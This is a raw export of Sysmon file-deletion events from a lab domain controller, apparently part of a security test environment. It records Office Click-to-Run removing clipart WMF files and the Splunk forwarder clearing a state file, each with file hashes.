23542300x800000000000000066671Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02465_.WMFMD5=9E12E0AEEA1A58E5343BA78ED903F569,SHA256=D7B7A21BCBF14AFD2CA8C4D20949810C04A89DC2A6E883C0437E5F4981E43099,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066670Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02464_.WMFMD5=2E31F00F333B2F2A100BAAD71AA6922E,SHA256=E0A8CDD64A7C6AE231E28E599304783B3D6CD5B43937FEB061A97D51F19918DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066669Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02439_.WMFMD5=B512511F05C1F0CF9D933790AF6AE5AC,SHA256=0D33285502364C4EAAF5A66EB3ECBFD09B666191B06FF5D6CF8A6E3128CA4F55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066668Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.502{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02437_.WMFMD5=1F6BECAF9167397D5136DD466791E188,SHA256=9D4A91968FCDF66FDA18F01136D43CFA2C09F194374375549213E7D9B44A266A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066667Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.502{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02431_.WMFMD5=F2815D3BEDD77285CB823BDEFF6AFB83,SHA256=296B819747816B0D3FC6519938B01C9F4C3C788C1AC2A7EE36153FC42DD81D12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066666Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.502{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02413_.WMFMD5=32C859E51F6754AA86F5CAB3812A3E60,SHA256=3CFF934A4A50370A75DCB39EFC25577CEEA01650E4A013D23F26D69FC5A926F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066665Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.502{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02276_.WMFMD5=5E30738F67F1EDECB56DBD03A500CDEE,SHA256=EF0BDD1727686ADA0F91EE3EF2E7A7D88A3AE99EB75D6A380C48776B80E1B728,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066664Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.502{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02270_.WMFMD5=297B9EBE416DDEA46C1DB6EA2D76CF65,SHA256=0E48CDF381E2767F7D3B4239E78592892604DB258701619A893C8301E7D5ECDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066663Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.502{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02269_.WMFMD5=F521BB9955B79B406EA34469531D7778,SHA256=A1327C8B5AF219C101A1AE852A72EBDD25481D92CD649A1747C8251149C13217,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066662Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.502{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02268_.WMFMD5=7B15BEA6676A7EC014F4CC8855007F71,SHA256=EF3F86DCF9633552867D183FD988A8119EA37FAE14D7F6FEFA6EC19BF74BD7FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066661Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.502{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02265_.WMFMD5=29A76CCF10819E38F95F37DCFF519788,SHA256=4E79136DB1FA30A3547643D3BF7ED61BF13CE86945F4CF1CEE64D76C131A3A54,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066660Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.502{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02263_.WMFMD5=E60936984A4AAD734588DE940C30D451,SHA256=EB50706B15FC20884E690A58A6D95F6119DC3C6173FAD23E2B1258C09C970511,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066659Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.502{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02261_.WMFMD5=4B4658F0CF218B36087A5DCA6674BC62,SHA256=AB75F47634E4527BAD24438C6C1AA001598168BAF518A0CB2DFF830B067CB74B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066658Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.502{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02253_.WMFMD5=A08B94344B4A5CD3174F5CF00F45D7C1,SHA256=5305537086DB75AE1C9A103ADDB163A1C4328376A1C4B7C0F83048F3C8944A56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066657Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.502{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02252_.WMFMD5=490F7CB972CAD4E6F91DE437FEBCA617,SHA256=5C52418D4670CFE15DAED8AFB7ECD4E5E9C41DF6A6D082AFF17DA026291BC32A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066656Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02233_.WMFMD5=3A83D1AD4E0E58BEED0E3D7BB96A9BF3,SHA256=F09A9287A2A8A9652F71366AEF82679420D9228400BE8FBD487FCB43FDFE4318,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066655Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02228_.WMFMD5=B142A58C930DE2C450485BEC45E2178B,SHA256=1FB4B6577C11009453D57D1AC5876F41E3787D5E812B6A035CE612CE3FC8D99B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066654Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02227_.WMFMD5=A370B40700B4C32E62C515AB150ED579,SHA256=C655FBF869F6FF574E4D4EB7D0BFEB821017AA0850FD036FEC94E7D698941354,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066653Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02094_.WMFMD5=920C5D3778301B63CF16513ADFBC23A3,SHA256=410C0A95C9336654988EAF7B6A839F623CB026C19DC4D03DCE98B78D242B4A69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066652Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02067_.WMFMD5=A8C9174064FA9518E725A31E2E79EEB9,SHA256=81E203A5ECB3E14096D829C54317A892928CB88A5A328722BCA4B884E7534B0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066651Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02055_.WMFMD5=8EA6581F01FC5B9D690ECC90928DC652,SHA256=B8581AEFBACB83BAA6E69766679C57E967CF2DEEEAA78F2D532CA89201FAAEAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066650Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02054_.WMFMD5=DDBDF02F11965515A29E8DD8B11869DF,SHA256=6AF9507B32DA532A8207907B0DE89B1B53998006935538ED887DFF9FC41CB780,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066649Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02051_.WMFMD5=8DD47277BCCA70AEA932482F72D2E9FB,SHA256=694A076C1E18738EE7C5892625D9E4BEAB982E1A0E6DB9C3FF50BB85CD72CEDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066648Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02048_.WMFMD5=A5165F31E4CC09E2BA1F3A459BA1B8F8,SHA256=78840B23A8AC1662F7ACB098B706EC4BD237C4BA6FEAC1E43F5BC549A1FEDBD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066647Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02045_.WMFMD5=AB341B48C328A1C320A60D550A0C9CC0,SHA256=32E6BF51FF48498DACE25F5994EE0E8AA311EE2516D36BA4723463DB78EE34A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066646Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02028_.WMFMD5=C099BBA864BC615F89AE47FB73AE11DB,SHA256=81F30D7525B31388AD2D010C5E36FA963C588D5BC8EC681F6FFB5238F733BEA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066645Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02025_.WMFMD5=1590F345E826EA2DE9D467AC85856960,SHA256=D31BC65F10CBC00FA98C564231D72A399D8015F5BD8B798AB17BE3EAACCE3AC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066644Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02024_.WMFMD5=9DD8B201D28FE3C0FC51B4840B494BDB,SHA256=E8214B01579B36B41FA29663E22B00D38801AEC2F80BDDC3DD357CF2E56C2B15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066643Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02022_.WMFMD5=2FF72DFED716335E2FDB8598A464A50E,SHA256=5F2EF04A5805243F515F286363A46B9BA6ECB8777835859037245B05DFC7E29A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066642Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02009_.WMFMD5=201A021CC864DDF5C997C5B02355DFFA,SHA256=C4053BE2051E7748EC420A81CBB2B63295D73E6E4E09A2A90127B06F0D39AEEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066641Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO01954_.WMFMD5=A1C9D8AECD692B4BEED770E74BA8C710,SHA256=A6DCAE7B26AEA0513367565AB285062E0A0A8FAC3795581900E3C08CBB0074FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066640Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO01905_.WMFMD5=7ADC2016AF0BCEA122A43D1027932D7F,SHA256=84A4283976C4E10FE4C41E840CF0AA5CBF81DFB09F2C69AE5E8781160E19D892,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066639Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO01805_.WMFMD5=477A05F4856CB7B4E3D43FC781BCDABF,SHA256=253FB61F3D0A902D724A8A859D29E298F1BAD6B8CFFA5CA440B4F2E7EA2E2DC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066638Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO01785_.WMFMD5=77DEA40D0408B9A0C935D450896FECB9,SHA256=2B2135012C499DAD827C634832195E9828187397215E1B89D72396F778CD9908,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066637Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO01777_.WMFMD5=88111EBDA0D93562EBDE63E56D8C4403,SHA256=31F7AF0996FD566A8E4ACCC5B87A609064D9D3B40AA0D3E25699E28D6E08589F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066636Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO01575_.WMFMD5=EF07F3732C3C38830AEC4A056DB181B7,SHA256=B0DB03274E238E6A59E7BDB4A4CF48846EB9B5A0103061A81EB90A59463EAA65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066635Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO01569_.WMFMD5=C2E2F25346041D7FBD85B53A1D6AA908,SHA256=E646C042CA6F3DB07DECA5B4203012D36BB357E653759E589FD57E0DD51F523E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066634Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO01568_.WMFMD5=3E47E16771CB5BBCA4157840FC8568BB,SHA256=7E8890B1A0F6FBC9CF1056576191447D6F390F14F6C9BA91FBC6B365AA50FCBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066633Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO01566_.WMFMD5=00C1F97152AC338AE0D50FEE0B36F298,SHA256=A0A96B02C7130ABA04783BB2EB661FBA9B450A587B6C5B1DBEA31391D5C385FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066632Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO01563_.WMFMD5=2BCBCD46B002E89944ADADF06D7B555D,SHA256=4D0DAF9049C58DA42FA41B4698353B0B2783129AC6BFDFDD0A76F3877EE72DE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066631Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO01561_.WMFMD5=21B3995145FE887CC84FCAE7943B4DAF,SHA256=13F1970C4D112F39985FBDDF68D5E1208B5860C02DE1757C04C000D9F0C40FC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066630Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO01560_.WMFMD5=3DC0EE03E3934B23343AC9AF63336839,SHA256=8FDEFBF2C082CB82701C7BB1C8E2D38C9523F88E2A1227ECC949FCCC866D9571,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066629Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO01236_.WMFMD5=5DA19F5DF38085B7FC591DD2347249C9,SHA256=856366B593F7F2616490F61808DEE067506BAE8FE99A144263ED7212DA12D79B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066628Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.470{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C17509B0469F2F25A01397BF9C4E7B69,SHA256=ECA367D4F742BC081C986FEEF4A10C6024018B664ABE6A89F31726FB4A121B0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066627Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO01063_.WMFMD5=C3C7ADFF35A2AD171C28976CB6338EDF,SHA256=5835A9F3E939057213465274C2E9CB297C7EB422B67B9759FEB2D239594E7281,IMPHASH=00000000000000000000000000000000falsetrue 